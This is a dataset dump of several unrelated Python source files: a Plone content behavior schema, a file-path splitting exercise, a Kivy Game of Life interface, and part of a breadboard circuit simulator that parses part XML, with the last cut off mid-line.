fields=['en_title', 'en_description', 'en_text', ]\n    )\n\n    model.fieldset(\n        'vote',\n        label=_(u\"Vote\"),\n        fields=['voteTitle', 'vote', 'voteEmail']\n    )\n\n    voteEmail = schema.Text(\n        title=_(u\"Vote Email\"),\n        required=False,\n    )\n\n    voteTitle = schema.TextLine(\n        title=_(u\"Vote Title\"),\n        required=True,\n    )\n\n    vote = schema.Int(\n        title=_(u\"Vote counter\"),\n        default=0,\n    )\n\n    en_title = schema.Text(\n        title=_(u\"English Title\"),\n        required=False,\n    )\n\n    en_description = schema.Text(\n        title=_(u\"English Description\"),\n        description=u\"English abstract, same format as the Chinese abstract\",\n        required=False,\n    )\n\n    en_text = RichText(\n        title=_(u\"English text\"),\n        required=False,\n    )\n\n    bigImage_1 = NamedBlobImage(\n        title=_(u\"Big Image\"),\n        description=_(u\"Big image for page. Size:1900 X 950\"),\n        required=False,\n    )\n\n    bigImage_2 = NamedBlobImage(\n        title=_(u\"Big Image\"),\n        description=_(u\"Big image for page. Size:1900 X 950\"),\n        required=False,\n    )\n\n    bigImage_3 = NamedBlobImage(\n        title=_(u\"Big Image\"),\n        description=_(u\"Big image for page. Size:1900 X 950\"),\n        required=False,\n    )\n\n    bigImage_4 = NamedBlobImage(\n        title=_(u\"Big Image\"),\n        description=_(u\"Big image for page. Size:1900 X 950\"),\n        required=False,\n    )\n\n    bigImage_5 = NamedBlobImage(\n        title=_(u\"Big Image\"),\n        description=_(u\"Big image for page. 
Size:1900 X 950\"),\n required=False,\n )\n\n photoer_1 = schema.TextLine(\n title=_(u\"Photographer\"),\n required=False,\n )\n\n photoer_2 = schema.TextLine(\n title=_(u\"Photographer\"),\n required=False,\n )\n\n photoer_3 = schema.TextLine(\n title=_(u\"Photographer\"),\n required=False,\n )\n\n photoer_4 = schema.TextLine(\n title=_(u\"Photographer\"),\n required=False,\n )\n\n photoer_5 = schema.TextLine(\n title=_(u\"Photographer\"),\n required=False,\n )\n\n\nalsoProvides(IBigImage, IFormFieldProvider)\n\n\ndef context_property(name):\n def getter(self):\n return getattr(self.context, name)\n def setter(self, value):\n setattr(self.context, name, value)\n def deleter(self):\n delattr(self.context, name)\n return property(getter, setter, deleter)\n\n\nclass BigImage(object):\n implements(IBigImage)\n adapts(IDexterityContent)\n\n def __init__(self,context):\n self.context = context\n\n # -*- Your behavior property setters & getters here ... -*-\n bigImage_1 = context_property(\"bigImage_1\")\n bigImage_2 = context_property(\"bigImage_2\")\n bigImage_3 = context_property(\"bigImage_3\")\n bigImage_4 = context_property(\"bigImage_4\")\n bigImage_5 = context_property(\"bigImage_5\")\n photoer_1 = context_property(\"photoer_1\")\n photoer_2 = context_property(\"photoer_2\")\n photoer_3 = context_property(\"photoer_3\")\n photoer_4 = context_property(\"photoer_4\")\n photoer_5 = context_property(\"photoer_5\")\n en_title = context_property(\"en_title\")\n en_description = context_property(\"en_description\")\n en_text = context_property(\"en_text\")\n vote = context_property(\"vote\")\n voteTitle = context_property(\"voteTitle\")\n voteEmail = context_property(\"voteEmail\")\n","repo_name":"mingtak/ts16.content_2018","sub_path":"src/ts16/content/behavior/behaviors.py","file_name":"behaviors.py","file_ext":"py","file_size_in_byte":4571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"27614297564","text":"# Напишите функцию, которая принимает на вход ��троку — абсолютный путь до файла.\n# Функция возвращает кортеж из трёх элементов: путь, имя файла, расширение файла.\n\ndef data_processing(data: str) -> tuple | None:\n try:\n index = data.rfind('/') + 1\n if index == 0:\n raise ValueError()\n path, file = data[:index], data[index:]\n file, form = file.split('.')\n return path, file, form\n except ValueError:\n return None\n\n\nif __name__ == \"__main__\":\n PATH_TO_FILE = 'ASDFASDF/ASD/A/SD/FA/SDF/ASD/Free.py'\n print(data_processing(PATH_TO_FILE))\n","repo_name":"SketchLife0/Web_python_developer","sub_path":"Погружение в Python/Seminar5/Task1.py","file_name":"Task1.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"4204112673","text":"import GameOfLife\nfrom .Controllers import GrowthMediumCTRL\nfrom kivy.clock import Clock\nfrom kivy.core.window import Window\nfrom kivy.factory import Factory\nfrom kivy.graphics import Color, Rectangle\nfrom kivy.graphics.instructions import InstructionGroup\nfrom kivy.lang import Builder\nfrom kivy.properties import NumericProperty, ListProperty\nfrom kivy.uix.button import Button\nfrom kivy.uix.gridlayout import GridLayout\nfrom kivy.uix.label import Label\nfrom kivy.uix.scrollview import ScrollView\nfrom kivy.uix.textinput import TextInput\nfrom kivy.uix.popup import Popup\nfrom os.path import dirname, abspath\n\n#\n# 
Styles\n#\n\nBuilder.load_file('{}/Views.kv'.format(dirname(abspath(GameOfLife.__file__))))\n\n\n#\n# Base Elements\n#\n\n\nclass CtrlButton(Button):\n    \"\"\" CtrlButton represents a button that interacts with the controller \"\"\"\n    def __init__(self, grid_ctrl: GrowthMediumCTRL, **kwargs: object):\n        self.ctrl = grid_ctrl\n        super().__init__(**kwargs)\n\n\nclass CtrlLabel(Label):\n    \"\"\" CtrlLabel represents a label that interacts with the controller \"\"\"\n    def __init__(self, grid_ctrl: GrowthMediumCTRL, **kwargs: object):\n        self.ctrl = grid_ctrl\n        super().__init__(**kwargs)\n\n\nclass CtrlPopup(Popup):\n    \"\"\" CtrlPopup represents a popup that interacts with the controller \"\"\"\n    def __init__(self, grid_ctrl: GrowthMediumCTRL, **kwargs: object):\n        self.ctrl = grid_ctrl\n        super(CtrlPopup, self).__init__(**kwargs)\n\n\nclass InputCtrl(TextInput):\n    \"\"\" InputCtrl represents a text input that interacts with the controller \"\"\"\n    def __init__(self, grid_ctrl: GrowthMediumCTRL, **kwargs: object):\n        self.ctrl = grid_ctrl\n        super().__init__(**kwargs)\n\n\n#\n# Main Layouts\n#\n\n\nclass GameLayout(GridLayout):\n    \"\"\" GameLayout represents the wrapper of all interface components \"\"\"\n    def __init__(self, grid_ctrl: GrowthMediumCTRL, **kwargs: object):\n        self.ctrl = grid_ctrl\n        super().__init__(**kwargs)\n        self.add_widget(ControlsBar(self.ctrl))\n        self.add_widget(Factory.TutorialLabel())\n        self.gms = GrowthMediumSurface(self.ctrl)\n        self.add_widget(self.gms)\n\n    def refresh_keyboard(self) -> None:\n        \"\"\" Refresh GrowthMediumSurface's keyboard listener\n\n        This method helps to reinstall the binding for the keyboard listener when a popup compromises it.\n\n        :return: None\n\n        \"\"\"\n        self.gms.refresh_keyboard()\n\n\nclass ControlsBar(GridLayout):\n    \"\"\" ControlsBar represents the wrapper of all main control buttons \"\"\"\n    def __init__(self, grid_ctrl: GrowthMediumCTRL, **kwargs: object):\n        self.ctrl = grid_ctrl\n        super().__init__(**kwargs)\n        self.add_widget(Factory.Load(self.ctrl))\n        self.add_widget(Factory.Save(self.ctrl))\n        self.add_widget(Factory.Reset(self.ctrl))\n        self.add_widget(Factory.Clear(self.ctrl))\n        self.add_widget(Factory.SpeedLabel(self.ctrl))\n        self.add_widget(Factory.SpeedDown(self.ctrl))\n        self.add_widget(Factory.Pause(self.ctrl))\n        self.add_widget(Factory.Start(self.ctrl))\n        self.add_widget(Factory.SpeedUp(self.ctrl))\n        self.add_widget(Factory.ZoomLabel(self.ctrl))\n        self.add_widget(Factory.ZoomOut(self.ctrl))\n        self.add_widget(Factory.ZoomIn(self.ctrl))\n\n\nclass GrowthMediumSurface(Label):\n    \"\"\" GrowthMediumSurface represents the GrowthMedium cells' grid\n\n    This class holds all the graphic information and transitions needed for a pretty and correct visualization of cell\n    evolution, 
from the colour of a single cell's state through the current grid view, its size and its position.\n\n    \"\"\"\n    # Current cells' state\n    cells = ListProperty()\n    old_cells = []\n\n    # Position and dimension information\n    cell_rows = NumericProperty()\n    cell_cols = NumericProperty()\n\n    zoom = NumericProperty()\n\n    pos_x = NumericProperty()\n    pos_y = NumericProperty()\n\n    # Size information for correct draw\n    cell_size_w = NumericProperty()\n    cell_size_h = NumericProperty()\n\n    border_w = NumericProperty()\n    border_h = NumericProperty()\n\n    hbar_w = NumericProperty()\n    hbar_h = 3\n    vbar_w = 3\n    vbar_h = NumericProperty()\n\n    # Canvas objects\n    cells_canvas = []\n    bars_canvas = []\n\n    # Colors\n    bars_color = (0, 0, 1, .8)\n    cell_color_state = [(0.2, 0.2, 0.2, 1), (0, 1, 0, .5), (1, 0, 0, .5)]\n\n    # guard flags to avoid draw bugs\n    _first_draw = True\n    _scheduled_draw = False\n\n    def __init__(self, grid_ctrl: GrowthMediumCTRL, **kwargs: object):\n        self.ctrl = grid_ctrl\n        super(GrowthMediumSurface, self).__init__(**kwargs)\n        Window.bind(on_resize=self._redraw)\n        self._keyboard = Window.request_keyboard(self._keyboard_closed, self)\n        self._keyboard.bind(on_key_down=self._on_keyboard_down)\n\n    #\n    # Draw managers\n    #\n\n    def on_cells(self, *args: object) -> None:\n        \"\"\" Cells listener\n\n        This method catches the updated cell state and manages the redraw of the GUI.\n\n        :return: None\n\n        \"\"\"\n        if len(self.cells) == len(self.old_cells) and not self._scheduled_draw:\n            self._draw_update()\n            self._draw_bars()\n        else:\n            self._redraw()\n        self.old_cells = self.cells\n\n    def texture_update(self, *args: object) -> None:\n        \"\"\" Texture listener\n\n        This method is used to draw the GUI the first time.\n\n        :return: None\n\n        \"\"\"\n        self._redraw()\n\n    #\n    # User input listeners\n    #\n\n    def refresh_keyboard(self) -> None:\n        \"\"\" Refresh keyboard listener\n\n        This method reinstalls the binding for the keyboard listener.\n\n        :return: None\n\n        \"\"\"\n        self._keyboard = Window.request_keyboard(self._keyboard_closed, self)\n        self._keyboard.bind(on_key_down=self._on_keyboard_down)\n\n    def _keyboard_closed(self):\n        self._keyboard.unbind(on_key_down=self._on_keyboard_down)\n        self._keyboard = None\n\n    def _on_keyboard_down(self, keyboard, keycode, text, modifiers):\n        if keycode[1] == 'spacebar':\n            if self.ctrl.is_running:\n                self.ctrl.pause_evolution()\n            elif self.ctrl.can_run:\n                self.ctrl.start_evolution()\n        elif keycode[1] == 'up':\n            self.ctrl.increase_zoom()\n        elif keycode[1] == 'down':\n            self.ctrl.decrease_zoom()\n        elif keycode[1] == 'left':\n            self.ctrl.decrease_fps()\n        elif keycode[1] == 'right':\n            self.ctrl.increase_fps()\n        elif keycode[1] == 'w':\n            self.ctrl.move_up()\n        elif keycode[1] == 'a':\n            self.ctrl.move_left()\n        elif keycode[1] == 's':\n            self.ctrl.move_down()\n        elif keycode[1] == 'd':\n            self.ctrl.move_right()\n        if keycode[1] in ['up', 'down', 'left', 'right', 'w', 'a', 's', 'd']:\n            self._draw_bars()\n\n    def on_touch_down(self, touch: object) -> None:\n        \"\"\" Click listener\n\n        This method catches the user's clicks to update the custom grid.\n\n        :return: None\n\n        \"\"\"\n        if not self.ctrl.is_running and self.height > touch.pos[1]:\n            w = int(touch.pos[0])\n            h = int(touch.pos[1])\n            i = max(self.cell_rows - int((h - self.border_h) / (self.cell_size_h + 1)) - 1, 0)\n            j = min(int((w - self.border_w) / (self.cell_size_w + 1)), self.cell_cols - 1)\n            self.ctrl.update_custom_growth_medium(i, j)\n\n    #\n    # Cells and bars designers\n    #\n\n    def _redraw(self, *args):\n        if not self._scheduled_draw:\n            self._scheduled_draw = True\n            
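# coalesce rapid redraw requests (e.g. window resizes): only one rebuild is scheduled at a time\n            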
Clock.schedule_once(self._schedule_redraw, self.zoom / 30)\n\n def _schedule_redraw(self, *args):\n self.canvas.clear()\n self.cells_canvas = [None] * len(self.cells)\n for i in range(self.cell_rows):\n for j in range(self.cell_cols):\n pos = j + (self.cell_rows - i - 1) * self.cell_cols\n cell = InstructionGroup()\n cell.add(Color(*self.cell_color_state[self.cells[pos]]))\n cell.add(Rectangle(\n pos=(\n j * (self.cell_size_w + 1) + self.border_w,\n i * (self.cell_size_h + 1) + self.border_h\n ), size=(self.cell_size_w, self.cell_size_h)))\n self.cells_canvas[pos] = cell\n self.canvas.add(cell)\n if not self._first_draw:\n self._draw_bars()\n else:\n self._first_draw = False\n self._scheduled_draw = False\n\n def _draw_bars(self):\n if len(self.bars_canvas) > 0:\n self.canvas.remove(self.bars_canvas.pop())\n self.canvas.remove(self.bars_canvas.pop())\n hbar = InstructionGroup()\n vbar = InstructionGroup()\n hbar.add(Color(*self.bars_color))\n vbar.add(Color(*self.bars_color))\n vbar.add(Rectangle(\n pos=(self.width - self.vbar_w - 1, self.border_h + self.vbar_pos_h),\n size=(self.vbar_w, self.vbar_h)))\n hbar.add(Rectangle(\n pos=(self.hbar_pos_w, 1),\n size=(self.hbar_w, self.hbar_h)))\n self.bars_canvas.append(vbar)\n self.bars_canvas.append(hbar)\n self.canvas.add(vbar)\n self.canvas.add(hbar)\n\n def _draw_update(self):\n for i in range(self.cell_rows):\n for j in range(self.cell_cols):\n pos = j + (self.cell_rows - i - 1) * self.cell_cols\n if self.cells[pos] != self.old_cells[pos]:\n new_cell = InstructionGroup()\n new_cell.add(Color(*self.cell_color_state[self.cells[j + (self.cell_rows - i - 1) * self.cell_cols]]))\n new_cell.add(Rectangle(\n pos=(\n j * (self.cell_size_w + 1) + self.border_w,\n i * (self.cell_size_h + 1) + self.border_h\n ), size=(self.cell_size_w, self.cell_size_h)))\n self.canvas.remove(self.cells_canvas[pos])\n self.cells_canvas[pos] = new_cell\n self.canvas.add(new_cell)\n\n\n#\n# Popups\n#\n\n\nclass SaveCtrlPopup(CtrlPopup):\n \"\"\" SaveCtrlPopup contains the view to save current GrowthMedium \"\"\"\n def __init__(self, keyboard_listener: GrowthMediumSurface, **kwargs: object):\n super(SaveCtrlPopup, self).__init__(**kwargs)\n self.keyboard_listener = keyboard_listener\n self.add_widget(SaveGridCtrl(self.ctrl))\n\n def dismiss(self, *largs: object, **kwargs: object):\n super().dismiss()\n self.keyboard_listener.refresh_keyboard()\n\n\nclass SaveGridCtrl(GridLayout):\n \"\"\" SaveGridCtrl contains all inputs to save current GrowthMedium \"\"\"\n def __init__(self, grid_ctrl: GrowthMediumCTRL, **kwargs: object):\n self.ctrl = grid_ctrl\n super(SaveGridCtrl, self).__init__(**kwargs)\n self.add_widget(InputCtrl(self.ctrl))\n self.add_widget(Factory.SavePopupBtn(self.ctrl))\n self.add_widget(Factory.CloseSavePopupBtn(self.ctrl))\n\n\nclass LoadCtrlPopup(CtrlPopup):\n \"\"\" LoadCtrlPopup contains the view to load a GrowthMedium \"\"\"\n def __init__(self, **kwargs: object):\n super(LoadCtrlPopup, self).__init__(**kwargs)\n self.add_widget(LoadGridCtrl(self.ctrl))\n\n\nclass LoadGridCtrl(GridLayout):\n \"\"\" LoadGridCtrl contains all inputs to load a GrowthMedium \"\"\"\n def __init__(self, grid_ctrl: GrowthMediumCTRL, **kwargs: object):\n self.ctrl = grid_ctrl\n super(LoadGridCtrl, self).__init__(**kwargs)\n self.add_widget(ScrollFilesCtrl(self.ctrl))\n self.add_widget(Factory.LoadLabel(self.ctrl))\n self.add_widget(ActionLoadGridCtrl(self.ctrl))\n\n\nclass ActionLoadGridCtrl(GridLayout):\n \"\"\" ActionLoadGridCtrl contains action's buttons \"\"\"\n def 
__init__(self, grid_ctrl: GrowthMediumCTRL, **kwargs: object):\n self.ctrl = grid_ctrl\n super(ActionLoadGridCtrl, self).__init__(**kwargs)\n self.add_widget(Factory.LoadPopupBtn(self.ctrl))\n self.add_widget(Factory.CloseLoadPopupBtn(self.ctrl))\n\n\nclass ScrollFilesCtrl(ScrollView):\n \"\"\" ScrollFilesCtrl contains the scrollable list of files \"\"\"\n def __init__(self, grid_ctrl: GrowthMediumCTRL, **kwargs: object):\n self.ctrl = grid_ctrl\n super(ScrollFilesCtrl, self).__init__(**kwargs)\n file_ctrl = FileCtrl(self.ctrl)\n file_ctrl.bind(minimum_height=file_ctrl.setter('height'))\n self.add_widget(file_ctrl)\n\n\nclass FileCtrl(GridLayout):\n \"\"\" FileCtrl contains the Growth Medium's input files list \"\"\"\n def __init__(self, grid_ctrl: GrowthMediumCTRL, **kwargs: object):\n self.ctrl = grid_ctrl\n super(FileCtrl, self).__init__(**kwargs)\n for file in self.ctrl.get_growth_medium_files():\n self.add_widget(Factory.FileCtrlBtn(self.ctrl, text=file))\n","repo_name":"LordAlucard90/Conway-s-Game-of-Life","sub_path":"GameOfLife/Views.py","file_name":"Views.py","file_ext":"py","file_size_in_byte":13008,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"39392075207","text":"import math\nimport os.path\nimport textwrap\n\nimport pygame.image\nimport xml.etree.ElementTree as Et\n\nfrom logic.electronics import Node, Sink\nfrom collections import namedtuple\nfrom _elementtree import ParseError\nfrom ui.interface import List, ListItem\nfrom ui.colours import *\nfrom ui.text import TextHandler\n\n\n# Named tuples for readable code\nBoardConfig = namedtuple(\"BoardConfig\", \"start_coord segment_gap per_segment_columns per_column_rows \"\n \"per_segment_rep_count per_segment_rep_gap rule\")\nRule = namedtuple(\"Rule\", \"segment repetition column row\")\nSupplyInfo = namedtuple(\"SupplyInfo\", \"pos_rail neg_rail radius\")\nDiscriminator = namedtuple(\"Discriminator\", \"segment rep column row name\")\n\n\n# Input an XML element and return a named tuple with extracted information about a breadboard\ndef get_board_config(element):\n start_coord = tuple(int(i) for i in element.find(\"startCoord\").text.split(\",\"))\n segment_gap = int(element.find(\"segmentGap\").text)\n per_segment_columns = int(element.find(\"perSegmentColumns\").text)\n per_column_rows = int(element.find(\"perColumnRows\").text)\n per_segment_rep = element.find(\"perSegmentRepetition\")\n per_segment_rep_count = int(per_segment_rep.text)\n per_segment_rep_gap = int(per_segment_rep.attrib.get(\"gap\"))\n rule = element.attrib.get(\"rule\").split(\",\")\n rule = Rule(\"SEGMENT\" in rule, \"REPETITION\" in rule, \"COLUMN\" in rule, \"ROW\" in rule)\n return BoardConfig(start_coord, segment_gap, per_segment_columns, per_column_rows, per_segment_rep_count,\n per_segment_rep_gap, rule)\n\n\n# Parse the part XML file and create Part objects for each entry\ndef parse(xml_path):\n try:\n\n # Create an object tree of the XML\n parts_xml = Et.parse(xml_path)\n\n # Get the parent root\n root = parts_xml.getroot()\n parts_tree = root.findall(\"part\")\n boards, ics, electronics = {}, {}, {}\n\n for part in parts_tree:\n\n try:\n # Get the name, description, name of textures, type and identifier of each element\n part_name = part.find(\"name\").text\n part_desc = part.find(\"desc\").text\n part_picture = part.find(\"picture\").text\n part_texture = part.find(\"texture\").text\n part_type = part.attrib.get(\"type\")\n part_uid = part.attrib.get(\"uid\")\n\n # If the part is a 
board, add it to the boards list\n if part_type == \"board\":\n board_config = part.find(\"boardConfig\")\n size = board_config.find(\"size\").text\n size = tuple(int(i) for i in size.split('x'))\n inch_tenth = int(board_config.find(\"inchTenth\").text)\n radius = int(board_config.find(\"radius\").text)\n\n main_board = board_config.find(\"mainBoard\")\n main_board_config = get_board_config(main_board)\n\n power_rails = board_config.find(\"powerRails\")\n if power_rails is not None:\n rail_config = get_board_config(power_rails)\n else:\n rail_config = None\n\n board = (part_name, part_desc, part_texture, part_picture, size, inch_tenth, radius,\n main_board_config, rail_config), Breadboard\n\n boards[part_uid] = board\n\n # If the part is a power supply, add it to the electronics list\n if part_type == \"supply\":\n power_config = part.find(\"powerConfig\")\n size = power_config.find(\"size\").text\n size = tuple(int(i) for i in size.split('x'))\n radius = int(power_config.find(\"nodeRadius\").text)\n inch_tenth = int(power_config.find(\"inchTenth\").text)\n voltage = int(power_config.find(\"voltage\").text)\n pos_node = power_config.find(\"posNodeCoord\").text\n pos_node = tuple(int(i) for i in pos_node.split(','))\n neg_node = power_config.find(\"negNodeCoord\").text\n neg_node = tuple(int(i) for i in neg_node.split(','))\n\n pos_info = SupplyInfo(pos_node, neg_node, radius)\n\n supply = (part_name, part_desc, part_texture, part_picture, size, voltage, pos_info, inch_tenth), \\\n PowerSupply\n electronics[part_uid] = supply\n\n # If the part is an IC, add it to the IC list\n if part_type == \"ic\":\n ic_config = part.find(\"icConfig\")\n dip_count = int(ic_config.find(\"dipCount\").text)\n raw_spice = textwrap.dedent(ic_config.find(\"rawSpice\").text)\n spice_nodes = tuple(ic_config.find(\"spiceNodes\").text.split(\" \"))\n datasheet = ic_config.find(\"datasheet\").text\n\n ic = (part_name, part_desc, part_texture, part_picture, dip_count, raw_spice, spice_nodes,\n datasheet), IntegratedCircuit\n ics[part_uid] = ic\n\n # If the part is an LED, add it to the electronics list\n if part_type == \"led\":\n led_config = part.find(\"ledConfig\")\n on_colour = tuple(int(i) for i in led_config.find(\"onColour\").text.split(','))\n off_colour = tuple(int(i) for i in led_config.find(\"offColour\").text.split(','))\n\n led = (part_name, part_desc, part_texture, part_picture, on_colour, off_colour), \\\n LED\n electronics[part_uid] = led\n\n # If the part is a switch, add it to the electronics list\n if part_type == \"switch\":\n switch_config = part.find(\"switchConfig\")\n dip_count = int(switch_config.find(\"dipCount\").text)\n spice_nodes = tuple(switch_config.find(\"spiceNodes\").text.split(\" \"))\n datasheet = switch_config.find(\"datasheet\").text\n latch = int(switch_config.attrib.get(\"latch\"))\n\n ele = (part_name, part_desc, part_texture, part_picture, dip_count, \"\", spice_nodes,\n latch, datasheet), Switch\n electronics[part_uid] = ele\n\n except TypeError:\n continue\n\n return boards, ics, electronics\n\n except (AttributeError, ParseError):\n return None, None, None\n\n\nclass PartManager:\n \"\"\"The PartManager structure holds every part in a category, to be used in creating UI Lists\"\"\"\n\n def __init__(self, title, desc, parts, project, small_title=None):\n self.title = title\n self.small_title = title if small_title is None else small_title\n self.desc = desc\n self.project = project\n self.parts = parts if parts is not None else {}\n\n def find(self, uid):\n if 
uid in self.parts:\n            return self.parts[uid]\n        return None\n\n    def create_list(self, size, pos, real_pos, env):\n        part_list = List(size, self.title, self.desc, pos, real_pos, env, small_title=self.small_title)\n        for part in self.parts:\n            conf = self.parts[part][0]\n            list_item = ListItem(part_list.size, conf[0], conf[3], conf[1], part, self, env)\n            part_list.list_items.append(list_item)\n        return part_list\n\n\nclass Part:\n    \"\"\"A base class for any part that can be placed in the editor space\"\"\"\n\n    BOARD_DESC = \"Breadboards are plastic holed boards in which electronic components can be inserted and connected \" \\\n                 \"with jumper wires for experimenting with circuits. To connect jumper wires, simply click on a \" \\\n                 \"breadboard or power supply hole and drag the new wire to your desired point.\"\n    IC_DESC = \"Integrated circuits (ICs) are small devices that contain interconnected electronic components on a \" \\\n              f\"single chip allowing for small, efficient chips that can perform logic. {' '*170}\" \\\n              \"NOTE: You must tie unused inputs on ICs to ground or 5V for de:volt simulation to function. This \" \\\n              \"practice encourages you to maintain healthy chip temperature and avoid high-impedance floating \" \\\n              \"inputs, which may cause confusing, unexpected logic errors in real life circuitry.\"\n    ELECTRONICS_DESC = \"Electrical components, such as resistors and diodes, are basic \" \\\n                       \"building blocks used in electronic circuits to control the flow of electricity and create \" \\\n                       f\"complex circuits that perform specific functions. {' '*120}NOTE: To make a resistor, draw a \" \\\n                       \"wire normally, then select it to choose a resistance.\"\n\n    # Initialising the class with any necessary attributes for any part type\n    def __init__(self, name, desc, texture, preview_texture, env):\n        path = env.get_main_path()\n        self.name = name\n        self.desc = desc\n        self.texture_name, self.preview_texture_name = texture, preview_texture\n        self.texture = pygame.image.load(os.path.join(path, 'assets', 'textures', 'parts', texture))\n        self.texture = self.texture.convert_alpha()\n        self.preview_texture = pygame.image.load(os.path.join(path, 'assets', 'textures', 'parts', preview_texture))\n        self.preview_texture = self.preview_texture.convert_alpha()\n        self.env = env\n\n\nclass PowerSupply(Part):\n    \"\"\"The Power Supply contains two breadboard-type nodes that represent a positive and negative electrical terminal\"\"\"\n\n    def __init__(self, name, desc, texture, preview_texture, size, voltage, pos_info, inch_tenth, env):\n        super().__init__(name, desc, texture, preview_texture, env)\n        self.size = size\n        self.inch_tenth = inch_tenth\n        self.voltage = voltage\n        self.pos_info = pos_info\n        neg_rail_coord = pos_info.neg_rail\n        pos_rail_coord = pos_info.pos_rail\n        radius = pos_info.radius\n        pos_rect_tl = (pos_rail_coord[0] - radius, pos_rail_coord[1] - radius)\n        neg_rect_tl = (neg_rail_coord[0] - radius, neg_rail_coord[1] - radius)\n        rect_wh = (radius*2, radius*2)\n        self.rects = [pygame.Rect(pos_rect_tl, rect_wh), pygame.Rect(neg_rect_tl, rect_wh)]\n        self.points = [BreadboardPoint(self, Discriminator(0, 0, 0, 1, \"main\"), Node(), self.rects[0]),\n                       BreadboardPoint(self, Discriminator(0, 0, 0, 0, \"main\"), Sink(), self.rects[1])]\n\n    def __getstate__(self):\n        \"\"\"Return state values to be pickled.\"\"\"\n        return self.name, self.desc, self.texture_name, self.preview_texture_name, self.size, self.voltage, \\\n               self.pos_info, self.inch_tenth\n\n    def __setstate__(self, state):\n        \"\"\"Restore state from 
the unpickled state values.\"\"\"\n self.__init__(*state, pygame.env)\n\n # Return a surface containing the power supply texture\n def surface(self, real_pos, scale):\n rect_hovered = None\n surface = self.texture.copy()\n incomplete_wire = any(isinstance(x, BreadboardPoint) for x in self.env.query_disable)\n if not len(self.env.query_disable) or incomplete_wire:\n surface_rect = surface.get_rect().copy()\n surface_rect.w *= scale[0]\n surface_rect.h *= scale[1]\n surface_rect.topleft = real_pos\n if surface_rect.collidepoint(pygame.mouse.get_pos()):\n for i, rect in enumerate(self.rects):\n r = rect.copy()\n real_r_pos = tuple(map(sum, zip(real_pos, (r.x * scale[0], r.y * scale[1]))))\n r.w *= scale[0]\n r.h *= scale[1]\n r.topleft = real_r_pos\n if r.collidepoint(pygame.mouse.get_pos()):\n rect_hovered = self.points[i]\n pygame.draw.rect(surface, COL_BLACK, rect)\n pygame.draw.rect(surface, COL_SELECTED, self.texture.get_rect(), width=math.floor(2 / scale[0]))\n if pygame.mouse.get_pressed()[0] and rect_hovered is None and not incomplete_wire:\n self.env.selected = self\n if self.env.selected == self:\n pygame.draw.rect(surface, COL_SELECTED, self.texture.get_rect(), width=math.floor(4 / scale[0]))\n return surface, rect_hovered\n\n\nclass Breadboard(Part):\n \"\"\"A breadboard structure contains a large array of breadboard points that can be interfaced with to connect\n electronics together, and place wires onto for prototypical simulation\"\"\"\n\n def __init__(self, name, desc, texture, preview_texture, size, inch_tenth, radius, main, power_rail, env, plugins=None):\n super().__init__(name, desc, texture, preview_texture, env)\n self.size = size\n self.inch_tenth = inch_tenth\n self.radius = radius\n self.env = env\n self.main_board_config = main\n self.pr_config = power_rail\n self.plugins = {} if plugins is None else plugins\n self.main_board_rects, self.main_rails = self.create_rects(main, \"main\")\n self.pr_rects, self.pr_rails = self.create_rects(power_rail, \"power\")\n self.plain_surface = pygame.Surface(self.texture.get_size())\n self.drawing_surface = self.texture.copy()\n\n def __getstate__(self):\n \"\"\"Return state values to be pickled.\"\"\"\n return self.name, self.desc, self.texture_name, self.preview_texture_name, self.size, self.inch_tenth, \\\n self.radius, self.main_board_config, self.pr_config, self.plugins\n\n def __setstate__(self, state):\n \"\"\"Restore state from the unpickled state values.\"\"\"\n self.__init__(*state[:-1], pygame.env, plugins=state[-1])\n self.rejuvenate()\n\n # For every plugin in the breadboard, update the references such that when loaded from a save state,\n # the plugin correctly simulates a connection between regenerated breadboard points\n def rejuvenate(self):\n for plugin in self.plugins:\n plugin_obj = self.plugins[plugin]\n if isinstance(plugin_obj, IntegratedCircuit):\n new_reqs = self.ic_requirements(plugin.discriminator, plugin_obj.dip_count)\n plugin_obj.pins_to_nodes = new_reqs\n if isinstance(plugin_obj, LED):\n old_anode_group = plugin_obj.anode_point.discriminator.name\n group_1 = None\n if old_anode_group == \"main\":\n group_1 = self.main_board_rects\n elif old_anode_group == \"power\":\n group_1 = self.pr_rects\n old_cathode_group = plugin_obj.cathode_point.discriminator.name\n group_2 = None\n if old_cathode_group == \"main\":\n group_2 = self.main_board_rects\n elif old_cathode_group == \"power\":\n group_2 = self.pr_rects\n plugin_obj.anode_point = group_1[plugin_obj.anode_point.discriminator][2]\n 
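# re-bind the cathode to its regenerated BreadboardPoint in the same way\n            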
plugin_obj.cathode_point = group_2[plugin_obj.cathode_point.discriminator][2]\n\n # Given a config, generate the correct number of breadboard points which the breadboard should contain\n def create_rects(self, board_config, name):\n if board_config is None:\n return {}, \"\"\n rects = {}\n rails = []\n\n # Two segments of a breadboard, separated by DIP support\n for segment in range(2):\n\n segment_y = board_config.start_coord[1] + (segment * board_config.segment_gap)\n\n # Inline repetitions of a segment\n for rep in range(board_config.per_segment_rep_count):\n\n rep_x = board_config.start_coord[0] + (rep * board_config.per_segment_rep_gap)\n\n # Vertical columns of breadboard points\n for column in range(board_config.per_segment_columns):\n\n column_x = rep_x + (self.inch_tenth * column)\n\n # Horizontal rows of breadboard points\n for row in range(board_config.per_column_rows):\n\n # Calculate the relation rule of the breadboard rail (how are they connected)\n rail_discrim = (segment if board_config.rule.segment else None,\n rep if board_config.rule.repetition else None,\n column if board_config.rule.column else None,\n row if board_config.rule.row else None)\n\n # Check if the rail already exists\n found = None\n for rail in rails:\n if rail.rail_discriminator == rail_discrim:\n found = rail\n if found is None:\n found = BreadboardRail(rail_discrim)\n rails.append(found)\n\n # Create a rect and a breadboard point\n row_y = segment_y + (self.inch_tenth * row)\n rect_tl = (column_x - (self.inch_tenth / 2), row_y - (self.inch_tenth / 2))\n rect_wh = (self.inch_tenth, self.inch_tenth)\n rect = pygame.Rect(rect_tl, rect_wh)\n discriminator = Discriminator(segment, rep, column, row, name)\n point = BreadboardPoint(self, discriminator, found, rect)\n\n # Store\n rects[discriminator] = rect, found, point\n\n return rects, rails\n\n # Calculate the amount of points required by an IC to fit on the breadboard\n def ic_requirements(self, ic_discrim, ic_dips):\n pins_to_nodes = {}\n for i in range(ic_dips):\n if i < ic_dips/2:\n discriminator = (ic_discrim.segment + 1, 